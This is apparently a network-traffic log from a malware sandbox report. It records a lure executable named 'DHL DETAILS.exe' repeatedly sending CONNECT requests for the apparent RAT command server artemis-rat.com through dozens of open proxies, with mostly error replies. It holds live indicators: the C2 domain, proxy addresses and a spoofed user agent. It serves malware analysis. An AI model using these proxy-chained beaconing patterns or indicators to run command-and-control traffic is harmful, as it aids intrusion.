Mar 9, 2024 13:14:15.246931076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
757	192.168.2.5	52374	70.166.167.55	57745	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.266280890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
758	192.168.2.5	52294	185.49.30.5	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.267915010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
759	192.168.2.5	52273	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.267915010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
760	192.168.2.5	52443	192.252.216.81	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.267929077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
761	192.168.2.5	52517	104.16.105.142	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.267975092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.422323942 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
762	192.168.2.5	52527	172.67.181.129	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.268062115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.422554016 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
763	192.168.2.5	52478	165.227.196.37	61899	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.271998882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.817462921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.536910057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.020947933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.833408117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
764	192.168.2.5	52347	43.131.246.77	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.272094011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
765	192.168.2.5	52283	47.93.121.200	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.275132895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.603660107 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
766	192.168.2.5	52392	184.181.217.194	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.275907993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
767	192.168.2.5	52551	172.67.181.107	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.276489019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.430725098 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
768	192.168.2.5	52210	52.172.1.186	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.286820889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
769	192.168.2.5	52504	92.204.134.38	56177	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.287034035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
770	192.168.2.5	52335	85.214.118.98	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.289937019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.610704899 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.1 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
771	192.168.2.5	52303	203.95.198.170	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.292290926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.659858942 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
772	192.168.2.5	52429	221.153.92.39	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.312237024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
773	192.168.2.5	52462	217.69.121.141	5806	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.312356949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.685792923 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
774	192.168.2.5	52521	67.55.186.25	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.312494993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.345633984 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
775	192.168.2.5	52570	47.184.175.164	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.319746971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.829123020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.567715883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.825834036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.177134991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.567599058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
776	192.168.2.5	52419	80.67.8.6	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.326658010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
777	192.168.2.5	52044	111.16.50.12	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.331496000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.974163055 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
778	192.168.2.5	52437	41.111.198.108	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.331538916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.910145044 CET	708	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:15 GMT Server: Apache Content-Length: 532 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
779	192.168.2.5	52421	51.83.140.70	8181	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
